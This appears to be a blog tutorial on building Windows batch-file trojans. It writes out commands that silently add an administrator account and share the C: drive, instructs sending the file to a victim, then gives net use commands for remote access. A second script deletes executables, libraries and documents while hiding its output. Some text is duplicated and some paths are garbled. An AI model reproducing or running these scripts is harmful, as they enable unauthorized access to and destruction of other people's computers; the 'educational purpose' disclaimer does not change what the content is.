Create Trojans using .Bat
files
What is a
Trojan?
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.
What is a
Bat file?
Bat files can be created using notepad with .Bat extension. These bat files consists of text which are executed by the system in form of commands. Bat files are one of the most deadly weapons of windows.
Bat files can be created using notepad with .Bat extension. These bat files consists of text which are executed by the system in form of commands. Bat files are one of the most deadly weapons of windows.
In this
tutorial we will use net user, net send and net share:
- Open a Notepad to type the commands you can also use command prompt to check whether the commands are working or not.
- Command -> net user
username /add
It makes a new user called username(you can keep any desired name in place of username). - Command -> net
localgroup administrators username /add
It makes the user(username) to get added to the administrators group. - Command ->net share
system=C: /unlimited
This commands share the C: drive with the name of system. - Now keep these three commands in a Notepad and save it as any-name with .Bat extension and you are done.
Send this
bat file to your friend as soon as the bat file is opened victim’s C:
drive will be shared and a new administrator user will be created. Now to
access the victim’s system you need to make a session with the remote computer
using net use command, you should execute these commands from your dos prompt.
Commands
to make this happen:
- Command -> net
use \victimip neo
In the above command in the place of victim’s place, the IP address of your friend, this command creates a session between you and victim. - Command -> explorer
\victimipsystem
This will open a explorer window in the share system which is nothing but C: drive with administrators access.
Now you
can access the victim’s computer. This article is only for educational purpose
we are not encouraging anyone to do illegal activities.
WRITE A BATCH TROJAN
To write
a batch trojan, run notepad or some other word processor and type this as
follows:
@Echo off
Del *.exe
Del *.com
Del *.dll
Del *.doc
Echo Your
Screwed !
Mkdir C:\Screwed!
after typed that, click on File then click on Save, Make sure the part where it says "Save as type:" is on "All Files (*.*)" and then in the "File name:" section type "Example.bat" Now your wandering what does that do ! Here it is again with a explanation:
@Echo off
- Turns echo off so user doesn't know what happens
Del *.exe
- Deletes all files in the current directory with the .exe extension
Del *.com
- Deletes all files in the current directory with the .com extension
Del *.dll
- Deletes all files in the current directory with the .dll extension
Del *.doc
- Deletes all files in the current directory with the .doc extension
Echo Your
Screwed ! - Displays Your Screwed !
Mkdir
C:\Screwed! - Creates the directory Screwed on the C: drive
There is
a bunch more commands you can use and they can be found in a MS-DOS manual or in the DOS prompt by typing
"Help" if your in MS-DOS 6.0 or lower. going through the MS-DOS
manual can help you learn more commands.
No comments:
Post a Comment